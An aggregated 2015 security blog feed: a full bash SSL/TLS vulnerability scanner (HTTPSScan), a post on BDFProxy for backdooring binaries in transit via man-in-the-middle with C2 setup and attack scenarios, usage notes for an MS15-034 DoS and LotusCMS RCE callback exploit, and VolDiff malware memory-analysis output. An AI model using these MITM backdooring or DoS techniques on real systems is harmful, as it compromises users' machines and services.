Quantcast
Channel: Bash Script – Security List Network™
Viewing all 120 articles
Browse latest View live

HTTPSScan – Shell script for testing the SSL/TLS Protocols

April 10, 2015, 2:11 pm
$
0
0

HTTPSScan is a Shell script for testing the SSL/TLS Protocols.

HTTPSScan is a Shell script for testing the SSL/TLS Protocols.

HTTPSScan is a Shell script for testing the SSL/TLS Protocols.

Check for SSL/TLS Vulnerabilities:
– SSLv2 (CVE-2011-1473)
– TLS CRIME (CVE-2012-4929)
– RC4 (CVE-2013-2566)
– Heartbleed (CVE-2014-0160)
– Poodle (CVE-2014-3566)
– FREAK (CVE-2015-0204)
– Weak Ciphers

Latest version-1.6:HeartBleed Added, code:

#!/usr/bin/env bash

# Script to test the most security flaws on a target SSL/TLS.
# Author:  Alexos (alexos at alexos dot org)
# Date:    03-05-2015
# Version: 1.0
#
# References:
# OWASP Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection 
# https://www.owasp.org/index.php/Testing_for_Weak_SSL/TLS_Ciphers,_Insufficient_Transport_Layer_Protection_%28OTG-CRYPST-001%29
# CVE-2011-1473
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1473
# CVE-2012-4929
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4929
# CVE-2013-2566
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2566
# CVE-2014-0160
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160
# CVE-2014-3566
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3566
# CVE-2015-0204
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0204
# Forward Secrecy
# http://blog.ivanristic.com/2013/06/ssl-labs-deploying-forward-secrecy.html
# Patching the SSL/TLS on Nginx and Apache Webservers
# http://alexos.org/2014/01/configurando-a-seguranca-do-ssl-no-apache-ou-nginx/

VERSION=1.6
clear

echo ":::    ::::::::::::::::::::::::::::::::::  ::::::::  ::::::::  ::::::::     :::    ::::    ::: "
echo ":+:    :+:    :+:        :+:    :+:    :+::+:    :+::+:    :+::+:    :+:  :+: :+:  :+:+:   :+: "
echo "+:+    +:+    +:+        +:+    +:+    +:++:+       +:+       +:+        +:+   +:+ :+:+:+  +:+ "
echo "+#++:++#++    +#+        +#+    +#++:++#+ +#++:++#+++#++:++#+++#+       +#++:++#++:+#+ +:+ +#+ "
echo "+#+    +#+    +#+        +#+    +#+              +#+       +#++#+       +#+     +#++#+  +#+#+# "
echo "#+#    #+#    #+#        #+#    #+#        #+#    #+##+#    #+##+#    #+##+#     #+##+#   #+#+ "
echo "###    ###    ###        ###    ###        ########  ########  ######## ###     ######    #### "
echo "V. $VERSION by Alexos Core Labs                                                        "

if [ $# -ne 2 ]; then
   echo Usage: $0 IP PORT
   exit
fi

HOST=$1
PORT=$2
TARGET=$HOST:$PORT
red=`tput setaf 1`
reset=`tput sgr0`

function ssl2 {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -ssl2 -connect "$TARGET" 2>/dev/null`"

proto=`echo "$ssl" | grep '^ *Protocol *:' | awk '{ print $3 }'`
cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`

if [ "$cipher" = '' ]; then
        echo 'Not vulnerable.  Failed to establish SSLv2 connection.'
else
        echo "Vulnerable!  SSLv2 connection established using $proto/$cipher"
fi
}

function crime {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -connect "$TARGET" 2>/dev/null`"
compr=`echo "$ssl" |grep 'Compression: ' | awk '{ print $2 } '`

if [ "$compr" = 'NONE' ]; then
        echo 'Not vulnerable. TLS Compression is not enabled.'
else
        echo "Vulnerable! Connection established using $compr compression."
fi
}

function rc4 {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -cipher RC4 -connect "$TARGET" 2>/dev/null`"
proto=`echo "$ssl" | grep '^ *Protocol *:' | awk '{ print $3 }'`
cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`
if [ "$cipher" = '' ]; then
echo 'Not vulnerable. Failed to establish RC4 connection.'
else
echo "Vulnerable! Connection established using $proto/$cipher"
fi
}

function heartbleed {
ssl="`echo "QUIT"|openssl s_client -connect "$TARGET" -tlsextdebug 2>&1|grep 'server extension "heartbeat" (id=15)' || echo safe 2>/dev/null`"

if [ "$ssl" = 'safe' ]; then
        echo 'The host is not vulnerable to Heartbleed attack.'
else
        echo "The host is vulnerable to Heartbleed attack."
fi
}

function poodle {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -ssl3 -connect "$TARGET" 2>/dev/null`"

proto=`echo "$ssl" | grep '^ *Protocol *:' | awk '{ print $3 }'`
cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`

if [ "$cipher" = '0000'  -o  "$cipher" = '(NONE)' ]; then
        echo 'Not vulnerable.  Failed to establish SSLv3 connection.'
else
        echo "Vulnerable!  SSLv3 connection established using $proto/$cipher"
fi
}

function freak {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -cipher EXPORT -connect "$TARGET" 2>/dev/null`"
cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`
if [ "$cipher" = '' ]; then
         echo 'Not vulnerable.  Failed to establish connection with an EXPORT cipher.'
else
         echo "Vulnerable! Connection established using $cipher"
fi
}

function null {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -cipher NULL -connect "$TARGET" 2>/dev/null`"
cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`
if [ "$cipher" = '' ]; then
         echo 'Not vulnerable.  Failed to establish connection with a NULL cipher.'
else
         echo "Vulnerable! Connection established using $cipher"
fi
}


function weak40 {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -cipher EXPORT40 -connect "$TARGET" 2>/dev/null`"

cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`

if [  "$cipher" = '' ]; then
        echo 'Not vulnerable. Failed to establish connection with 40 bit cipher.'
else
        echo "Vulnerable! Connection established using 40 bit cipher"
fi
}


function weak56 {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -cipher EXPORT56 -connect "$TARGET" 2>/dev/null`"

cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`

if [  "$cipher" = '' ]; then
        echo 'Not vulnerable. Failed to establish connection with 56 bit cipher.'
else
        echo "Vulnerable! Connection established using 56 bit cipher"
fi
}

function forward {
ssl="`echo 'Q' | ${timeout_bin:+$timeout_bin 5} openssl s_client -cipher 'ECDH:DH' -connect "$TARGET" 2>/dev/null`"

proto=`echo "$ssl" | grep '^ *Protocol *:' | awk '{ print $3 }'`
cipher=`echo "$ssl" | grep '^ *Cipher *:' | awk '{ print $3 }'`

if [ "$cipher" = ''  -o  "$cipher" = '(NONE)' ]; then
        echo 'Forward Secrecy is not enabled.'
else
        echo "Enabled! Established using $proto/$cipher"
fi
}
echo
echo [*] Analyzing SSL/TLS Vulnerabilities on $HOST:$PORT ...
echo
echo Generating Report...Please wait
echo
echo "{red}==> ${reset} Checking SSLv2 (CVE-2011-1473)"
echo
ssl2
echo
echo "${red}==> ${reset} Checking CRIME (CVE-2012-4929)"
echo
crime
echo
echo "${red}==> ${reset} Checking RC4 (CVE-2013-2566)"
echo
rc4
echo
echo "${red}==> ${reset} Checking Heartbleed (CVE-2014-0160)"
echo
heartbleed
echo
echo "${red}==> ${reset} Checking Poodle (CVE-2014-3566)"
echo
poodle
echo
echo "${red}==> ${reset} Checking FREAK (CVE-2015-0204)"
echo
freak
echo
echo "${red}==> ${reset}Checking NULL Cipher"
echo
null
echo
echo "${red}==> ${reset} Checking Weak Ciphers"
echo
weak40
echo
weak56
echo
echo "${red}==> ${reset}Checking Forward Secrecy"
echo
forward
echo
#echo
#echo [*] Checking Preferred Server Ciphers
#sslscan $HOST:$PORT > $LOGFILE
#cat $LOGFILE| sed '/Prefered Server Cipher(s):/,/^$/!d' | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g"
#rm $LOGFILE
echo [*] done

 

Download : Master.zip  | Clone Url
Source : https://github.com/alexoslabs

Search

Updates The Backdoor Factory Proxy (BDFProxy) version-0.3.2.

April 14, 2015, 12:20 am
$
0
0

For security professionals and researchers only.

Change : Add support for BDF 3.0

This script rides on two libraries for usage: The Backdoor Factory (BDF) and the mitmProxy.
Concept:
Patch binaries during download ala MITM.
Why:
Because a lot of security tool websites still serve binaries via non-SSL/TLS means.
Here’s a short list:

sysinternals.com
Microsoft - MS Security Essentials
Almost all anti-virus companies
Malwarebytes
Sourceforge
gpg4win
Wireshark
etc...

+ Supported Environment:

Tested on all Kali Linux builds, whether a physical beefy laptop, a Raspberry Pi, or a VM, each can run BDFProxy.

Install:
BDF is in bdf/
Run the following to pull down the most recent:

./install.sh

OR:

git clone https://github.com/secretsquirrel/the-backdoor-factory bdf/
If you get a certificate error, run the following:

mitmproxy
And exit [Ctr+C] after mitmProxy loads.

Usage:

Update everything before each use:

./update.sh

 READ THE CONFIG!!!

-->bdfproxy.cfg

You will need to configure your C2 host and port settings before running BDFProxy. DO NOT overlap C2 PORT settings between different payloads. You’ll be sending linux shells to windows machines and things will be segfaulting all over the place. After running, there will be a metasploit resource script created to help with setting up your C2 communications. Check it carefully. By the way, everything outside the [Overall] section updates on the fly, so you don’t have to kill your proxy to change settings to work with your environment.

But wait! You will need to configure your mitm machine for mitm-ing! If you are using a wifiPineapple I modded a script put out by hack5 to help you with configuration. Run ./wpBDF.sh and enter in the correct configs for your environment. This script configures iptables to push only http (non-ssl) traffic through the proxy. All other traffic is fowarded normally.

Then:

./bdf_proxy.py

Here’s some sweet ascii art for possible phyiscal settings of the proxy:
Lan usage:

<Internet>----<mitmMachine>----<userLan>

WIFI Usage :

<Internet>----<mitmMachine>----<wifiPineapple>))

 Testing : 

Suppose you want to use your browser with Firefox and FoxyProxy to connect to test your setup.

    Update your config as follows:
    transparentProxy = False

    Configure FoxyProxy to use BDFProxy as a proxy.
    Default port in the config is 8080.

+ Logging:

We have it. The proxy window will quickly fill with massive amounts of cat links depending on the client you are testing. Use tail -f proxy.log to see what is getting patched and blocked by your blacklist settings. However, keep an eye on the main proxy window if you have chosen to patch binaries manually, things move fast and behind the scences there is multi-threading of traffic, but the intial requests and responses are locking for your viewing pleasure.

+ Attack Scenarios (all with permission of targets):
-Evil Wifi AP
-Arp Redirection
-Physical plant in a wiring closet
-Logical plant at your favorite ISP

Download version :
BDFProxy-0.3.2.tar.gz(14 KB)
BDFProxy-0.3.2.zip(14 KB)  | Our Post Before | Source : https://github.com/secretsquirrel

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @midnite_runr

Updates Exploits v-16.04.15 – Miscellaneous proof of concept exploit code.

April 16, 2015, 10:23 am
$
0
0

Changelog and tool added 16/04/2015:
+ iislap.py : Added very specific KILL flag
+ DoS Exploit for MS-15-034, http.sys Remote Denial of Service/Remote Code Execution, for IIS.

a screenshot of testing with SSL

a screenshot of testing with SSL

Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.
Updates Exploits 16.04.2015 :
+ phpMoAdmin Remote Code Execution (CVE-2015-2208)
+ LotusCMS Remote Code Execution (OSVDB-75095)
+ ElasticSearch Remote Code Execution (CVE-2015-1427)
+ ShellShock (httpd) Remote Code Execution (CVE-2014-6271)
+ IISlap – http.sys Denial of Service/RCE PoC (DoS only). (MS-15-034)
+ TBA

There is no changelogs here, as that would be too much effort, just git commits. Exploits may be updated regularly for greater stability, reliability or stealthiness, so check them for updates regularly

screenshot of testing without SSL.

screenshot of testing without SSL.

DoS Exploit for MS-15-034, http.sys Remote Denial of Service/Remote Code Execution, for IIS.
The “http.sys” component in Microsoft Windows is vulnerable to a denial of service or remote code execution exploit. Microsoft is witholding exact details of the vulnerability currently, however denial of service exploit code is becoming available in the wild and in use, hence, we decided to release our proof of concept utility for the vulnerability.
The impact of this vulnerability is that it can cause a denial of service condition against the host (“Blue Screen of Death”), or, lead to remote code execution under the context of the SYSTEM user on the affected host. This leads either to complete loss of availability, or, complete compromise of confidentiality and integrity of data on the host, and probable loss of availability.

Usage :
To use this exploit/test utility, there are 4 arguments. -t/–target, which is mandatory, and is the IP address or hostname of the target host, -p/–port, the target port, which defaults to 80, -s/–ssl, which tells it to use SSL (defaults to no ssl), and -f/–file, which is the path to the file you wish to GET on the remote host. This defaults to “/”, or the webroot. It should be noted that the denial of service condition seems to happen repeatably if you supply it with a file to GET instead of just the webroot, and this sho uld be taken into account during testing. Static files are the ones to watch out for – dynamic files such as ones generated by server side scripts (such as ASP.NET pages), do not tend to lead to the box falling over. If you REALLY want to DoS the box (as a PoC, not recommended!), set the -k, or –kill flag. This leads to a far more reliable denial of service condition if combined with -f

Usage Global SCript:
To use, simply select which payload you want to use (currently only back_python.php is available, but I plan on adding back_php.php and back_perl.php at a later date). This is the “payload.php”. You also must specify a callback host and port, along with the URL to the vulnerable LotusCMS installation.

Download : Master.zip  | Clone Url | Our Post Before
Source : https://github.com/XiphosResearch | http://www.xiphosresearch.com/

VolDiff – Malware Memory Footprint Analysis.

April 19, 2015, 8:13 pm
$
0
0

VolDiff is a bash script that runs Volatility plugins against memory images captured before and after malware execution. It creates a report that highlights system changes.

VolDiff is a simple yet powerfull malware analysis tool that enables malware analysts to quickly identify IOCs and understand advanced malware behaviour.

Use Directions:
1.Capture a memory dump of a clean Windows system and save it as “baseline.raw”. This image will serve as a baseline for the analysis.
2.Execute your malware sample on the same system, then take a second memory dump and save it as “infected.raw”.
3.Run VolDiff:

./VolDiff.sh path/to/baseline.raw path/to/infected.raw profile
"profile" should be "Win7SP0x86" or "Win7SP1x64" etc.

VolDiff will save the output of a selection of Volatility plugins for both memory images (baseline and infected), then it will create a report to highlight notable changes (new processes, network connections, injected code, drivers etc).

Example Output :

PC-RESEARCHERS$ ./VolDiff.sh 
 _    __      ______  _ ________
| |  / /___  / / __ \(_) __/ __/
| | / / __ \/ / / / / / /_/ /_  
| |/ / /_/ / / /_/ / / __/ __/  
|___/\____/_/_____/_/_/ /_/     

Volatility analysis report generated by VolDiff v0.9.1 (https://github.com/aim4r/VolDiff).

Suspicious new netscan entries
=========================================================================

Offset(P)          Proto    Local Address                  Foreign Address      State            Pid      Owner          Created
0x3da3f618         TCPv4    172.16.108.128:139             0.0.0.0:0            LISTENING        4        System         
0x3daeccf8         TCPv4    0.0.0.0:80                     0.0.0.0:0            LISTENING        2108     explorer.exe   
0x3dad8008         TCPv4    172.16.108.128:49167           62.24.131.168:80     CLOSED           924      svchost.exe    
0x3fc7b630         TCPv4    172.16.108.128:49164           65.55.50.157:443     CLOSED           924      svchost.exe    
0x3fc8b5f0         TCPv4    172.16.108.128:49165           62.24.131.168:80     CLOSED           924      svchost.exe    
0x3fdf2348         TCPv4    172.16.108.128:49168           87.236.215.151:80    CLOSED           2108     explorer.exe   


Suspicious new pslist entries
=========================================================================

Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit                          
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x855c9738 wuauclt.exe            3976    924      5       97      1      0 2015-04-18 22:58:09 UTC+0000                                 
0x872de0c0 cmd.exe                1184   1544      0 --------      0      0 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  
0x8510c980 ipconfig.exe           2544   1184      0 --------      0      0 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  
0x85123030 conhost.exe            2560    360      0 --------      0      0 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  
0x8510c980 ipconfig.exe           2544   1184      0 --------      0      0 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  


Suspicious new psscan entries
=========================================================================

Offset(P)          Name                PID   PPID PDB        Time created                   Time exited                   
------------------ ---------------- ------ ------ ---------- ------------------------------ ------------------------------
0x000000003dade0c0 cmd.exe            1184   1544 0x3ee13380 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  
0x000000003fd0c980 ipconfig.exe       2544   1184 0x3ee135c0 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  
0x000000003f9c9738 wuauclt.exe        3976    924 0x3ee134e0 2015-04-18 22:58:09 UTC+0000                                 
0x000000003fd0c980 ipconfig.exe       2544   1184 0x3ee135c0 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  
0x000000003fd23030 conhost.exe        2560    360 0x3ee13500 2015-04-18 22:58:29 UTC+0000   2015-04-18 22:58:29 UTC+0000  

Suspicious new ldrmodules entries
=========================================================================

Pid      Process              Base       InLoad InInit InMem MappedPath
-------- -------------------- ---------- ------ ------ ----- ----------
     360 csrss.exe            0x4a040000 True   False  True  \Windows\System32\csrss.exe
     424 csrss.exe            0x011a0000 False  False  False \Windows\Fonts\vga850.fon
    1096 svchost.exe          0x00220000 True   False  True  \Windows\System32\svchost.exe
    1324 spoolsv.exe          0x009d0000 False  False  False \Windows\System32\spool\drivers\w32x86\3\fr-FR\PS5UI.DLL.mui
    2108 explorer.exe         0x04990000 False  False  False \Windows\System32\fr-FR\crypt32.dll.mui
    2108 explorer.exe         0x020b0000 False  False  False \Windows\System32\fr-FR\mpr.dll.mui
    2108 explorer.exe         0x040b0000 False  False  False \Windows\System32\fr-FR\urlmon.dll.mui
    2108 explorer.exe         0x06b80000 False  False  False \Windows\System32\imageres.dll
    2108 explorer.exe         0x04a70000 False  False  False \Windows\System32\fr-FR\oleaccrc.dll.mui
    2108 explorer.exe         0x03690000 False  False  False \Windows\System32\fr-FR\user32.dll.mui
    2108 explorer.exe         0x02280000 False  False  False \Windows\System32\fr-FR\shdocvw.dll.mui
    2108 explorer.exe         0x046e0000 False  False  False \Windows\System32\fr-FR\KernelBase.dll.mui
    2108 explorer.exe         0x03700000 False  False  False \Windows\System32\fr-FR\winmm.dll.mui
    2108 explorer.exe         0x02270000 False  False  False \Windows\System32\fr-FR\imageres.dll.mui
    3976 wuauclt.exe          0x00ac0000 True   False  True  \Windows\System32\wuauclt.exe
    3976 wuauclt.exe          0x00100000 False  False  False \Windows\System32\oleaccrc.dll
    3976 wuauclt.exe          0x00310000 False  False  False \Windows\System32\fr-FR\wucltux.dll.mui


Suspicious new malfind entries
=========================================================================

Process: explorer.exe Pid: 2108 Address: 0x22f0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 2, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x022f0000  4d 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00   MZ..............
0x022f0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x022f0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
0x022f0030  00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00   ............@...

0x22f0000 4d               DEC EBP
0x22f0001 5a               POP EDX
0x22f0002 0000             ADD [EAX], AL
0x22f0004 0000             ADD [EAX], AL
0x22f0006 0000             ADD [EAX], AL
0x22f0008 0000             ADD [EAX], AL
0x22f000a 0000             ADD [EAX], AL
0x22f000c 0000             ADD [EAX], AL
0x22f000e 0000             ADD [EAX], AL
0x22f0010 0000             ADD [EAX], AL
0x22f0012 0000             ADD [EAX], AL
0x22f0014 0000             ADD [EAX], AL
0x22f0016 0000             ADD [EAX], AL
0x22f0018 0000             ADD [EAX], AL
0x22f001a 0000             ADD [EAX], AL
0x22f001c 0000             ADD [EAX], AL
0x22f001e 0000             ADD [EAX], AL
0x22f0020 0000             ADD [EAX], AL
0x22f0022 0000             ADD [EAX], AL
0x22f0024 0000             ADD [EAX], AL
0x22f0026 0000             ADD [EAX], AL
0x22f0028 0000             ADD [EAX], AL
0x22f002a 0000             ADD [EAX], AL
0x22f002c 0000             ADD [EAX], AL
0x22f002e 0000             ADD [EAX], AL
0x22f0030 0000             ADD [EAX], AL
0x22f0032 0000             ADD [EAX], AL
0x22f0034 0000             ADD [EAX], AL
0x22f0036 0000             ADD [EAX], AL
0x22f0038 0000             ADD [EAX], AL
0x22f003a 0000             ADD [EAX], AL
0x22f003c 40               INC EAX
0x22f003d 0000             ADD [EAX], AL
0x22f003f 00               DB 0x0


Process: explorer.exe Pid: 2108 Address: 0x10060000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: CommitCharge: 65537, MemCommit: 1, PrivateMemory: 1, Protection: 6

0x10060000  55 89 e5 53 57 56 81 ec 9c 01 00 00 8b 45 08 c7   U..SWV.......E..
0x10060010  45 ec 04 00 00 00 8b 4d ec c7 45 c0 01 00 00 00   E......M..E.....
0x10060020  8b 55 c0 c7 85 e8 fe ff ff 01 00 00 00 8b b5 e8   .U..............
0x10060030  fe ff ff c7 85 18 ff ff ff 20 00 00 00 c6 85 53   ...............S

0x10060000 55               PUSH EBP
0x10060001 89e5             MOV EBP, ESP
0x10060003 53               PUSH EBX
0x10060004 57               PUSH EDI
0x10060005 56               PUSH ESI
0x10060006 81ec9c010000     SUB ESP, 0x19c
0x1006000c 8b4508           MOV EAX, [EBP+0x8]
0x1006000f c745ec04000000   MOV DWORD [EBP-0x14], 0x4
0x10060016 8b4dec           MOV ECX, [EBP-0x14]
0x10060019 c745c001000000   MOV DWORD [EBP-0x40], 0x1
0x10060020 8b55c0           MOV EDX, [EBP-0x40]
0x10060023 c785e8feffff01000000 MOV DWORD [EBP-0x118], 0x1
0x1006002d 8bb5e8feffff     MOV ESI, [EBP-0x118]
0x10060033 c78518ffffff20000000 MOV DWORD [EBP-0xe8], 0x20
0x1006003d c6               DB 0xc6
0x1006003e 85               DB 0x85
0x1006003f 53               PUSH EBX


Suspicious new timeliner entries
=========================================================================

1970-01-01 00:00:00 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:49164 -> 65.55.50.157:443| 924/TCPv4/CLOSED/0x3fc7b630
1970-01-01 00:00:00 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:49165 -> 62.24.131.168:80| 924/TCPv4/CLOSED/0x3fc8b5f0
1970-01-01 00:00:00 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:49167 -> 62.24.131.168:80| 924/TCPv4/CLOSED/0x3dad8008
1970-01-01 00:00:00 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:49168 -> 87.236.215.151:80| 2108/TCPv4/CLOSED/0x3fdf2348
2015-04-18 22:49:24 UTC+0000|[PROCESS]| lsm.exe| PID: 524/PPID: 412/POffset: 0x3e014030
2015-04-18 22:49:24 UTC+0000|[PROCESS]| services.exe| PID: 508/PPID: 412/POffset: 0x2594c3a8
2015-04-18 22:49:24 UTC+0000|[PROCESS]| winlogon.exe| PID: 480/PPID: 404/POffset: 0x3e368628
2015-04-18 22:49:25 UTC+0000|[PROCESS]| svchost.exe| PID: 640/PPID: 508/POffset: 0x3e072c48
2015-04-18 22:49:26 UTC+0000|[PROCESS]| vmtoolsd.exe| PID: 1544/PPID: 508/POffset: 0x3e178130
2015-04-18 22:49:27 UTC+0000|[PROCESS]| TPAutoConnSvc.| PID: 1792/PPID: 508/POffset: 0x3e1bbd40
2015-04-18 22:49:32 UTC+0000|[PROCESS]| conhost.exe| PID: 2184/PPID: 424/POffset: 0x3da32030
2015-04-18 22:49:32 UTC+0000|[PROCESS]| explorer.exe| PID: 2108/PPID: 2084/POffset: 0x3da16828
2015-04-18 22:51:27 UTC+0000|[PROCESS]| mscorsvw.exe| PID: 3176/PPID: 508/POffset: 0x3e135538
2015-04-18 22:56:42 UTC+0000|[NETWORK CONNECTION]| fe80::2587:a98d:6d2c:9d30:546 -> *:*| 756/UDPv6//0x3fd00008
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| ::1:1900 -> *:*| 3140/UDPv6//0x3df328f0
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| 127.0.0.1:1900 -> *:*| 3140/UDPv4//0x3f930008
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| 127.0.0.1:58120 -> *:*| 3140/UDPv4//0x3fce9008
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| ::1:58118 -> *:*| 3140/UDPv6//0x3f930a58
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:137 -> *:*| 4/UDPv4//0x3fac8640
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:138 -> *:*| 4/UDPv4//0x3da0e2d0
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:1900 -> *:*| 3140/UDPv4//0x3e1db610
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:58119 -> *:*| 3140/UDPv4//0x3fc51990
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| fe80::2587:a98d:6d2c:9d30:1900 -> *:*| 3140/UDPv6//0x3dc2ec70
2015-04-18 22:56:43 UTC+0000|[NETWORK CONNECTION]| fe80::2587:a98d:6d2c:9d30:58117 -> *:*| 3140/UDPv6//0x3fdc2e98
2015-04-18 22:58:09 UTC+0000|[PROCESS]| wuauclt.exe| PID: 3976/PPID: 924/POffset: 0x3f9c9738
2015-04-18 22:58:29 UTC+0000|[NETWORK CONNECTION]| 0.0.0.0:0 -> *:*| 1232/UDPv4//0x3f297f50
2015-04-18 22:58:29 UTC+0000|[NETWORK CONNECTION]| 0.0.0.0:5355 -> *:*| 1232/UDPv4//0x3f9346f8
2015-04-18 22:58:29 UTC+0000|[NETWORK CONNECTION]| 0.0.0.0:5355 -> *:*| 1232/UDPv4//0x3fac7110
2015-04-18 22:58:29 UTC+0000|[NETWORK CONNECTION]| :::0 -> *:*| 1232/UDPv6//0x3f297f50
2015-04-18 22:58:29 UTC+0000|[NETWORK CONNECTION]| 172.16.108.128:68 -> *:*| 756/UDPv4//0x3faa0238
2015-04-18 22:58:29 UTC+0000|[NETWORK CONNECTION]| :::5355 -> *:*| 1232/UDPv6//0x3f9346f8
2015-04-18 22:58:29 UTC+0000|[PROCESS]| cmd.exe| PID: 1184/PPID: 1544/POffset: 0x3dade0c0 End: 2015-04-18 22:58:29 UTC+0000
2015-04-18 22:58:29 UTC+0000|[PROCESS]| conhost.exe| PID: 2560/PPID: 360/POffset: 0x3fd23030 End: 2015-04-18 22:58:29 UTC+0000
2015-04-18 22:58:29 UTC+0000|[PROCESS]| ipconfig.exe| PID: 2544/PPID: 1184/POffset: 0x3fd0c980 End: 2015-04-18 22:58:29 UTC+0000


Suspicious new svcscan entries
=========================================================================

Process ID: -
Service State: SERVICE_STOPPED
Binary Path: -
Process ID: 876
Service State: SERVICE_RUNNING
Binary Path: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
Process ID: 924
Service State: SERVICE_RUNNING
Binary Path: C:\Windows\system32\svchost.exe -k netsvcs


Suspicious new cmdline entries
=========================================================================

wuauclt.exe pid:   3976
Command line : "C:\Windows\system32\wuauclt.exe"
************************************************************************
cmd.exe pid:   1184
conhost.exe pid:   2560
ipconfig.exe pid:   2544


Suspicious new mutantscan entries
=========================================================================

Offset(P)              #Ptr     #Hnd Signal Thread           CID Name
------------------ -------- -------- ------ ---------- --------- ----
0x000000003da022f8        3        2      1 0x00000000           HGFSMUTEX
0x000000003da3e120        2        1      1 0x00000000           5827a689a8a470200835d840817112f0
0x000000003daaab90        2        1      1 0x00000000           WininetProxyRegistryMutex
0x000000003df68d60        2        1      0 0x855d8248 2108:1140 41df362a3f3d701bb5b5749a3e43f484
0x000000003e171b68        5        4      1 0x00000000           d3b1bbc7-c020-4056-9ded-7c6f40b5a2fc
0x000000003f984208        2        1      0 0x852c41d0 2108:3712 ad1751de900a1713cecd716adfda611f
0x000000003f99a228        2        1      1 0x00000000           WininetStartupMutex
0x000000003f9ddef8        2        1      0 0x872aabe0  2108:668 cb16681dee85a67993f0759da19566be
0x000000003fcd69a0        2        1      1 0x00000000           WininetConnectionMutex

Suspicious new getsids entries
=========================================================================

wuauclt.exe (3976): S-1-5-21-2921091077-2763243831-321783825-1000 (victim)
wuauclt.exe (3976): S-1-5-21-2921091077-2763243831-321783825-513 (Domain Users)
wuauclt.exe (3976): S-1-1-0 (Everyone)
wuauclt.exe (3976): S-1-5-32-544 (Administrators)
wuauclt.exe (3976): S-1-5-32-545 (Users)
wuauclt.exe (3976): S-1-5-4 (Interactive)
wuauclt.exe (3976): S-1-2-1 (Console Logon (Users who are logged onto the physical console))
wuauclt.exe (3976): S-1-5-11 (Authenticated Users)
wuauclt.exe (3976): S-1-5-15 (This Organization)
wuauclt.exe (3976): S-1-5-5-0-276475 (Logon Session)
wuauclt.exe (3976): S-1-2-0 (Local (Users with the ability to log in locally))
wuauclt.exe (3976): S-1-5-64-10 (NTLM Authentication)
wuauclt.exe (3976): S-1-16-8192 (Medium Mandatory Level)
cmd.exe (1184): S-1-5-18 (Local System)
cmd.exe (1184): S-1-5-32-544 (Administrators)
cmd.exe (1184): S-1-1-0 (Everyone)
cmd.exe (1184): S-1-5-11 (Authenticated Users)
cmd.exe (1184): S-1-16-16384 (System Mandatory Level)
conhost.exe (2560): S-1-5-18 (Local System)
conhost.exe (2560): S-1-5-32-544 (Administrators)
conhost.exe (2560): S-1-1-0 (Everyone)
conhost.exe (2560): S-1-5-11 (Authenticated Users)
conhost.exe (2560): S-1-16-16384 (System Mandatory Level)
ipconfig.exe (2544): S-1-5-18 (Local System)
